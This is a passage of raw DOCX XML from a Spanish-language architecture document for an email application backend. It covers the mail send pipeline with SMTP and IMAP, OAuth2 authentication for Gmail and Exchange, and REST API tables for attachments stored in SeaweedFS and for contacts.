        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"bodyHtml"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;p&gt;Estimado equipo,&lt;/p&gt;&lt;p&gt;Adjunto nuestra propuesta...&lt;/p&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"bodyText"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Estimado equipo, Adjunto nuestra propuesta..."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"attachments"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"sw://accounts/123/attachments/file.pdf"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"replyTo"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"emailId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"507f1f77bcf86cd799439020"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"messageId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;original@email.com&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"references"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;root@thread.com&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;original@email.com&gt;"</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"includeSignature"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">true</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El pipeline de envío implementa una transacción distribuida con compensación: (1) Nodemailer transmite el mensaje vía SMTP con pooling de conexiones y STARTTLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[68]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; (2) tras confirmación</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">250 OK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, se copia en la carpeta Sent vía IMAP APPEND con los flags apropiados</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[60]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; (3) se elimina el draft de MongoDB; (4) se encola un job para indexar el mensaje enviado. Si el paso 2 falla, se encola un retry en BullMQ con exponential backoff; si el paso 1 falla, se marca el draft como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">status: 'failed'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y se notifica al usuario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[203]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para cuentas Gmail, el envío SMTP requiere autenticación OAuth2 (XOAUTH2) ya que Google eliminó completamente la autenticación básica en marzo de 2025</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[58]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Microsoft depreca Basic Authentication para Exchange Online con deadline de abril de 2026</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[59]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. imapflow y Nodemailer soportan autenticación vía</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">accessToken</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">como alternativa a password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[41]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="93"/>
    <w:bookmarkStart w:id="94" w:name="adjuntos"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.6 Adjuntos</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1173"/>
        <w:gridCol w:w="880"/>
        <w:gridCol w:w="1906"/>
        <w:gridCol w:w="1906"/>
        <w:gridCol w:w="2053"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Método</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Body Params</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Query Params</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/attachments/upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sube archivo adjunto temporal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">file: multipart/form-data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">draftId?: string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/attachments/:storageKey</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Descarga archivo adjunto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">download?: boolean</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(force download vs inline)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/attachments/:storageKey/preview</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Obtiene preview del adjunto (imágenes, PDFs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">width?: number</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">height?: number</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">DELETE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/attachments/:storageKey</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Elimina archivo adjunto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Los archivos adjuntos se almacenan en SeaweedFS, seleccionado como alternativa a MinIO tras el archivo de su edición comunitaria en febrero de 2026. SeaweedFS ofrece licencia Apache 2.0 y está especialmente optimizado para escenarios de alto I/O con muchos archivos pequeños — el patrón típico de attachments de email</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[177]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La metadata de cada adjunto (nombre, MIME type, tamaño, storageKey) se registra en la colección MongoDB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">attachments</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mientras el contenido binario reside en SeaweedFS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El endpoint de upload acepta archivos mediante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">multipart/form-data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con un límite de 25MB por archivo. Los archivos se validan contra una lista de tipos MIME permitidos y se escanean con ClamAV antes del almacenamiento definitivo. El</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">storageKey</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">generado sigue la convención</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{userId}/{timestamp}_{hash}.{ext}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para evitar colisiones.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="94"/>
    <w:bookmarkStart w:id="95" w:name="contactos"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.7 Contactos</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1173"/>
        <w:gridCol w:w="880"/>
        <w:gridCol w:w="1906"/>
        <w:gridCol w:w="1906"/>
        <w:gridCol w:w="2053"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Método</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Body Params</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Query Params</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/contacts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lista contactos del usuario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">query?: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(búsqueda),</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">limit?: number</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(default: 50),</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">offset?: number</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">sort?: 'name' \| 'recent' \| 'frequent'</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(default:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">‘</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">name</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">’</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/contacts/autocomplete</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Autocomplete para compositor (sub-50ms)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">q: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(mínimo 2 caracteres),</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
